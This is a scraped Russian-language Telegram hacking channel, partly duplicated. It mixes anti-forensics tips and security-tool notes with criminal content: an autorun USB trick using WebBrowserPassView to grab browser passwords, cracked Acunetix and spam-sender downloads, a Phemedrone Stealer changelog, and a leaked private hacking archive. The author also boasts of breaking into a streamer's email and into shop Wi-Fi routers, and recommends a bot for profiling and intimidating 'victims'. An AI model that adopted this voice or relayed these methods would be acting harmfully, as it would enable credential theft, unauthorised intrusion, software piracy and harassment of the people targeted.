Forwarded from Mycroft Intelligence
Пришло время заглянуть чуть глубже в кроличью нору. Раньше мы практически не затрагивали такую объемную тему, как антифорензика. Но это было раньше. Теперь мы с вами погрузимся в очаровательный мир противодействия сбору цифровых доказательств против нас любимых.
Начну с ультимативного решения. Просто зашифруйте системный раздел или вообще весь диск. Цифровые доказательства невозможно собрать, если они зашифрованы. Но это в том случае, если компьютер выключен. Именно выключен, а не находится в режиме сна или гибернации. А что делать, если машину взяли «на горячем», прямо во время работы?
Для начала нужно сформировать правильные привычки. И первая из них – регулярно чистить свои следы в системе. Как ни странно, но для этих целей подойдет простой советский, есть в каждой квартире… CCleaner [1]. Да, вы не ослышались. Эта проприетарная штука может быть очень полезна при затирании следов вашей активности. Я хоть и не люблю проприетарный софт, но CCleaner – небольшое исключение из правил.
Дальше он сделает все за вас. Ну почти. В CCleaner вам нужен раздел Windows. Там вы можете поставить галочки на регулярную очистку логов системы, различных типов кэша, стереть информацию о сетевой активности (в том числе кэш DNS) и много чего другого. Это, конечно, не панацея, а часть большой работы по вычищению авгиевых конюшен телеметрии окошек. Вот такой первый шаг. Второй шаг – усилить CCleaner с помощью Enchancer [2], он поможет всю эту дрянь вычистить больше и глубже.
Повторюсь: CCleaner – это не панацея. Она поможет затереть только самые поверхностные следы активности системы. Все остальное нужно затирать с использованием более интересных инструментов и методов. А на прощание – установите себе LastActivityView [3] и прогоните на своей системе. Узнаете много нового. И не всегда приятного.
Подписывайтесь на канал, делайте репосты, ставьте реакции. Всем безопасности!
#инструментарий
Начну с ультимативного решения. Просто зашифруйте системный раздел или вообще весь диск. Цифровые доказательства невозможно собрать, если они зашифрованы. Но это в том случае, если компьютер выключен. Именно выключен, а не находится в режиме сна или гибернации. А что делать, если машину взяли «на горячем», прямо во время работы?
Для начала нужно сформировать правильные привычки. И первая из них – регулярно чистить свои следы в системе. Как ни странно, но для этих целей подойдет простой советский, есть в каждой квартире… CCleaner [1]. Да, вы не ослышались. Эта проприетарная штука может быть очень полезна при затирании следов вашей активности. Я хоть и не люблю проприетарный софт, но CCleaner – небольшое исключение из правил.
Дальше он сделает все за вас. Ну почти. В CCleaner вам нужен раздел Windows. Там вы можете поставить галочки на регулярную очистку логов системы, различных типов кэша, стереть информацию о сетевой активности (в том числе кэш DNS) и много чего другого. Это, конечно, не панацея, а часть большой работы по вычищению авгиевых конюшен телеметрии окошек. Вот такой первый шаг. Второй шаг – усилить CCleaner с помощью Enchancer [2], он поможет всю эту дрянь вычистить больше и глубже.
Повторюсь: CCleaner – это не панацея. Она поможет затереть только самые поверхностные следы активности системы. Все остальное нужно затирать с использованием более интересных инструментов и методов. А на прощание – установите себе LastActivityView [3] и прогоните на своей системе. Узнаете много нового. И не всегда приятного.
Подписывайтесь на канал, делайте репосты, ставьте реакции. Всем безопасности!
#инструментарий
🔥3
TDSSKiller - это бесплатная утилита, разработанная компанией Kaspersky Lab, для обнаружения и удаления руткитов с компьютера. Руткиты - это вредоносные программы, которые скрывают свое присутствие на зараженном компьютере и могут быть сложными для обнаружения обычными антивирусными программами. TDSSKiller специально создан для борьбы с этим типом вредоносных программ и может помочь вам избавиться от них.
❤3👍1
Chipsec - это инструмент для безопасности и анализа системы, разработанный для проверки наличия уязвимостей в процессорах, чипсетах и других компонентах аппаратного обеспечения компьютера. Он предоставляет возможность проводить тестирование на утечку информации, анализ конфигурации безопасности и обнаружение потенциальных уязвимостей на уровне железа. Chipsec может быть использован как инструмент для проверки безопасности системы и выявления потенциальных проблем, связанных с аппаратным обеспечением.
❤3
ладно, пора уже подытожить канал выжимкой из самой важной информации.
если желаешь кардинально поднять навыки в хакинге, то изучи данные ресурсы, их хватит чтобы ты уже мог осуществлять свои первые взломы систем.
p.s для полноты знаний следует начать читать канал с нуля, а не с последних постов🥰
https://textfiles.com/directory.html
https://heartb1eed.github.io/OSINT-panel
https://crycry00.github.io/hacking
https://roadmap.sh/cyber-security
https://github.com/ihebski/A-Red-Teamer-diaries
https://github.com/curiv/russian-offensive-security-questions
https://book.redteamguides.com/
https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
если желаешь кардинально поднять навыки в хакинге, то изучи данные ресурсы, их хватит чтобы ты уже мог осуществлять свои первые взломы систем.
p.s для полноты знаний следует начать читать канал с нуля, а не с последних постов
https://textfiles.com/directory.html
https://heartb1eed.github.io/OSINT-panel
https://crycry00.github.io/hacking
https://roadmap.sh/cyber-security
https://github.com/ihebski/A-Red-Teamer-diaries
https://github.com/curiv/russian-offensive-security-questions
https://book.redteamguides.com/
https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍2
забыл скинуть
https://www.nirsoft.net/utils/index.html
в общем куча утилит для восстановления паролей и прочего
одну из них можно закинуть на флешку, поставить автозапуск и дамп данных, она соберет все пароли с браузеров у пк, к которому подключена. по опыту - хватало 2 сек и можно вытаскивать, данные собраны.
(утилита WebBrowserPassView)
https://www.nirsoft.net/utils/index.html
в общем куча утилит для восстановления паролей и прочего
одну из них можно закинуть на флешку, поставить автозапуск и дамп данных, она соберет все пароли с браузеров у пк, к которому подключена. по опыту - хватало 2 сек и можно вытаскивать, данные собраны.
(утилита WebBrowserPassView)
NirSoft
Freeware Tools and System Utilities for Windows
Unique collection of freeware utilities and freeware password recovery tools
👍3
Forwarded from C.I.T. Security
Acunetix v24.4.240427095 - 30 Apr 2024
Windows:
Linux:
Password:
Changelog:
Too long for a post, refer here:
Windows:
https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240427095-Windows-Pwn3rzs-CyberArsenal.rarLinux:
https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240427095-Linux-Pwn3rzs-CyberArsenal.7zPassword:
Pwn3rzsChangelog:
Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v24-4-0-30-april-2024/❤1
Forwarded from All Stuff
GET HACK PRIVATE.rar
334.4 MB
Слив с 10 по 17 месяц приватки Get Hack Storage (Styx Market)
❤1
Forwarded from All Stuff
Phemedrone Stealer V2.2.0.zip
4.1 MB
- Fixed Bugs
- Added Google token grabber
- Now Stealer steal browsers without killing their process (tested on Chromium and FireFox)
- Stealer now sends password tags and
cookies tags along with the file
- Added Google token grabber
- Now Stealer steal browsers without killing their process (tested on Chromium and FireFox)
- Stealer now sends password tags and
cookies tags along with the file
👍2
Forwarded from All Stuff
Savage Benz 2023 Tools [Final] - Updated.zip
269.5 MB
SAVAGE BENZ PAID TOOLS CRACKED
Recommeded To Use Python 3.9.8
Run setup.bat file
Download The Tool:
https://learn.microsoft.com/en-GB/cpp/windows/latest-supported-vc-redist?view=msvc-170
Run Main.py File
Then Run Cert.exe File as Administrator -> Only Required for First Time Run.
Finally Patch.bat File To Open any of The Tool.
Make Sure You Place The Keys In YOUR_KEYS_HERE.txt File.
IMPORTANT: Remove The Unwanted E2S- and Dead-Mail- From The Key !
The Key For 9wolf Sender -> FUCK_THE_9WOLF_SHIT_SENDER
Sold by WeedyDev but here for free, and if you want to visit WeedyDev: He's Living in Ghana. 😃
Recommeded To Use Python 3.9.8
Run setup.bat file
Download The Tool:
https://learn.microsoft.com/en-GB/cpp/windows/latest-supported-vc-redist?view=msvc-170
Run Main.py File
Then Run Cert.exe File as Administrator -> Only Required for First Time Run.
Finally Patch.bat File To Open any of The Tool.
Make Sure You Place The Keys In YOUR_KEYS_HERE.txt File.
IMPORTANT: Remove The Unwanted E2S- and Dead-Mail- From The Key !
The Key For 9wolf Sender -> FUCK_THE_9WOLF_SHIT_SENDER
Sold by WeedyDev but here for free, and if you want to visit WeedyDev: He's Living in Ghana. 😃
👍2
Forwarded from WeedyDev </>
👍2
https://github.com/peass-ng/PEASS-ng
утилиты для поиска уязвимостей и повышения привилегий (winpeas для винды)
утилиты для поиска уязвимостей и повышения привилегий (winpeas для винды)
👍2
ладно, пошёл наплыв новых людей, поэтому расскажу историю, сидел я на стриме какого то игрового блогера, увидел в браузере его авторизованную почту, решил развлечься и посмотреть что можно из неё добыть, нашёл слитые пароли, в слитых паролях оказался его номер, и по номеру я нашёл вторую почту..
смог авторизоваться через неё в майл почте, скучная площадка, пошел пробовать авторизоваться в гмайле, увидел что пароль подошёл, но ему пришёл код, ибо двойная защита, словил фейспалм и забил, потому что впринципе самое интересное гмайл почта
ладно, мораль басни такова, даже если у вас такие как я попросят почту, или номер телефона, по этим данным опытные парнишки могут вас и взломать, но встретите ли вы таких?
смог авторизоваться через неё в майл почте, скучная площадка, пошел пробовать авторизоваться в гмайле, увидел что пароль подошёл, но ему пришёл код, ибо двойная защита, словил фейспалм и забил, потому что впринципе самое интересное гмайл почта
ладно, мораль басни такова, даже если у вас такие как я попросят почту, или номер телефона, по этим данным опытные парнишки могут вас и взломать, но встретите ли вы таких?
а ещё, я как то увидел пост, что во всех сетях магазина "Магнит" стоит один и тот же пароль в роутерах, по всей стране
не поленился, пошёл по городу проверять, и в 5+ роутерах спокойно авторизовался, в последнем роутере какой системный админ сменил пароль, хоть кто то работу выполняет как следует
спустя время я попытался снова найти этот пост, но больше я его нигде не мог найти, но этот опыт на миг заставил меня задуматься, как же все на самом деле может быть уязвимо, а мы просто не можем до этого додуматься.
а нужно было всего лишь сбрутить один вайфай магнита, чтобы получить доступ к вайфаю по всей стране
не поленился, пошёл по городу проверять, и в 5+ роутерах спокойно авторизовался, в последнем роутере какой системный админ сменил пароль, хоть кто то работу выполняет как следует
спустя время я попытался снова найти этот пост, но больше я его нигде не мог найти, но этот опыт на миг заставил меня задуматься, как же все на самом деле может быть уязвимо, а мы просто не можем до этого додуматься.
а нужно было всего лишь сбрутить один вайфай магнита, чтобы получить доступ к вайфаю по всей стране
👍2
когда я писал сайт на тему пробива, я не охватил в нем ряд интересных ботов, поэтому принял решение сделать о них отдельные посты
"поиск чата", на самом деле крайне мощный инструмент, если знать как к нему подступиться.
имея его в своем арсенале, ты можешь расширить свой функционал будь то запугивание людей, что ты знаешь в каких чатах они сидят, будь то популярные люди, с которыми ты хотел бы связаться.
я его использовал разве что, для определения интересов выбранной мной жертвы и его круга близких лиц (но ты конечно же можешь найти и свою выгоду)
https://t.iss.one/chatsvkbot
"поиск чата", на самом деле крайне мощный инструмент, если знать как к нему подступиться.
имея его в своем арсенале, ты можешь расширить свой функционал будь то запугивание людей, что ты знаешь в каких чатах они сидят, будь то популярные люди, с которыми ты хотел бы связаться.
я его использовал разве что, для определения интересов выбранной мной жертвы и его круга близких лиц (но ты конечно же можешь найти и свою выгоду)
https://t.iss.one/chatsvkbot